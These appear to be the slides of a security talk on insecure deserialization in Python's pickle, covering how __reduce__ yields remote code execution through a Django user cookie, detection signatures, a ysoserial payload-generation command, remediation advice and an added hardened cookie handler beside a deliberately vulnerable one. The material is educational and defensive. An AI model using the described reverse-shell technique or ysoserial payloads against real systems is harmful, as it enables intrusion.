The Chick has to break out of the shell 1
@pavanw3b
1: https://www.youtube.com/watch?v=ozMPRSZ8Ykk
Why talk about Insecure Deserialization Weakness?
● Many people in Security don't understand it 1
● Hard to find for most
● OWASP Top 10 2021 A8: Software & Data Integrity Failures
● It's fun!
● It's a Python day, but it is the same in any technology
1: Observed that most candidates fail to explain it clearly in interviews
Let's look at Bruce, I mean Object
character = {"first_name": "Bruce", "last_name": "Banner"}
● Dictionary in Python
● character is an Object
● Object: material that can be seen, touched etc.
● Object in OOP: an instance of a class
● Class: defines the characteristics and features
I thought Python dict is a data type.
Are you saying it's a class?
The difference (type vs. class) got thinner over time, and now they are the same!
More details: https://stackoverflow.com/a/35959047
Stored. Why?
● Manage state
● Persist as data for processing later
● Recreate objects even if the program is terminated
● Stored on disk, database, caches, socket, message bus etc.
@pavanw3b
Transmitted. Why?
● Server to client - end user
● For consumption by different technology
● Two machines: Machine A wants to send rich object to Machine B
instead of plain data.
16
@pavanw3b
Reconstructed. Why?
● Server to client - end user
● Another technology needs to process it
● Could be a shared micro service
Why do we serialize?
● An object in one environment can't be understood by another
● Pass data between different layers
○ Client to server
○ File/DB to business layer etc.
● Micro services
● OOP & MVC influence us to see everything as Objects and Models.
Python Pickle
● Python's standard-library module for serializing and deserializing
● Built-in modules are preferred over third-party ones
● Implements a binary protocol
Pickling = Serializing, Marshalling, Flattening
● Converts Objects into a byte stream
● dump() vs dumps(): writes to a pickled file vs returns a bytes object
Unpickling
● Converts serialized data back into Objects
Now the problem is
● Not secure
● Only unpickle data you trust
● Leads to RCE otherwise
@pavanw3b
Let’s take a deeper look
python serialize-to-file.py python deserialize-from-file.py
22
@pavanw3b
I can control the object. How do I RCE?
● Use the same way as serialization
● Serialize an RCE payload and pass it to the (insecure) deserialization
● Problem: the payload should be an Object!
● Solution: __reduce__()
● Special instructions telling pickle how to reconstruct an object it cannot handle natively.
● E.g.: an open file
Target: Django Application
● User form data is pickled and set as a cookie
● The cookie value is unpickled on the next request
● Expects a base64-encoded "user" cookie
● Design: get the User object from the client side
● #MVC
Getting a Reverse Shell from the Target
● Use __reduce__ and return os.system with your RCE payload
● Serialize it, base64-encode it and print it
● Edit the user cookie and reload
Why does Pickle behave this way?
● Not because pickles contain code
● Because they create objects by calling constructors named in the pickle
● Pickle Virtual Machine (PVM)
● The serialized stream is actually instructions
● It handles the opcodes directly!
@pavanw3b
Common places to check for insecure deserialization
● Cookie values
● Files: User supplied, log files, panda dataframe to binary
● Social media feeds / tweets
● User controlled data gets converted into Objects
30
@pavanw3b
Watch out for in White box Code Reviews
● Python: pickle.loads(), pickle.load(), yaml.load()
● Php: unserialize()
● Java: XMLdecoder, XStream.fromXML(),
ObjectInputStream().readObject(), readObject,
readObjectNodData, readResolve, readExternal,
readUnshared, Serializable etc
31
@pavanw3b
Watch out for in Black box dynamic testing
● Python: data ends with dot (.)
● Java: AC ED 00 Hex, ro0 in base64,
Content-type: application:x-java-serialized-object
● .NET: AAEAAAD//////
32
@pavanw3b
Utilities for detection and exploitation
● frohoff/ysoserial: Java
java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 ‘ping domain.com’ > payload
● pwntester/ysoserial.net: .NET
● Burp Extension: Java Deserialization Scanner by federicodotta
33
@pavanw3b
Remediate
● Don’t spoil your Pickle: Don’t unpickle untrusted data
● Other language: Use Look Ahead along with a Whitelist of Classes
● Be careful about the whitelist: DoS - Billion laughs attack incase of Hash,
Array etc Classes
● Fix: Java 9: Serial Filters or check the depth or size
34
@pavanw3b
Design & Configurations Recommendations
● Prefer language-agnostic formats: JSON, YAML over native binary
● Sign data with hmac and check it is not tampered with
● Don’t rely on WAFs alone: They don’t have visibility to internal
● Avoid generic serialization, use class-specific serialization
35
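The cookie handler from the Django target slide beside a hardened version that applies the remediation slides (verify an HMAC over the bytes, then unpickle through a whitelisting Unpickler). This is an added example, not the talk's demo application; SECRET_KEY, the cookie layout and the function names are assumptions.

```python
import base64
import binascii
import hashlib
import hmac
import io
import pickle

# Constructed server-side secret (hypothetical); real deployments load it from a secret store.
SECRET_KEY = b"example-secret-key-not-for-production"
SEP = b"."  # base64 never contains ".", so it safely separates payload and tag


def load_user_cookie_vulnerable(cookie: bytes) -> dict:
    """The pattern from the target slide: decode and unpickle whatever the client sent.
    Any callable reachable via __reduce__ in the stream runs inside pickle.loads()."""
    return pickle.loads(base64.b64decode(cookie))


class RestrictedUnpickler(pickle.Unpickler):
    """Whitelist approach: every global lookup is refused unless listed, so the stream can
    only rebuild plain data (dict, list, str, int, ...). Extend ALLOWED only for audited classes."""
    ALLOWED = frozenset()  # e.g. frozenset({("datetime", "date")})

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def make_user_cookie(user: dict, key: bytes = SECRET_KEY) -> bytes:
    """Serialize on the server and sign the bytes, so the client can carry but not forge them."""
    payload = base64.b64encode(pickle.dumps(user, protocol=4))
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    return payload + SEP + tag


def load_user_cookie_hardened(cookie: bytes, key: bytes = SECRET_KEY) -> dict:
    """Verify the HMAC first (constant-time compare), then unpickle under the whitelist."""
    payload, _, tag = cookie.rpartition(SEP)
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    if not payload or not hmac.compare_digest(tag, expected):
        raise ValueError("user cookie signature mismatch")
    try:
        raw = base64.b64decode(payload, validate=True)
    except binascii.Error as exc:
        raise ValueError("user cookie is not valid base64") from exc
    return RestrictedUnpickler(io.BytesIO(raw)).load()


if __name__ == "__main__":
    cookie = make_user_cookie({"first_name": "Bruce", "last_name": "Banner"})
    print(load_user_cookie_hardened(cookie))
    tampered = cookie[:-1] + (b"0" if cookie[-1:] != b"0" else b"1")
    try:
        load_user_cookie_hardened(tampered)
    except ValueError as exc:
        print("rejected:", exc)
```

Even a correctly signed cookie whose stream names a global (for example a pickled range object) is refused by RestrictedUnpickler, which is the defence in depth the remediation slide asks for.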
References:
● pickle — Python object serialization — Python 3.10.5 documentation
● Pickling Objects in Python
● BlackHat 2011 - Sour Pickles, A serialised exploitation guide in one part
● Class vs. Type in Python - Stack Overflow
● Deserialization - OWASP Cheat Sheet Series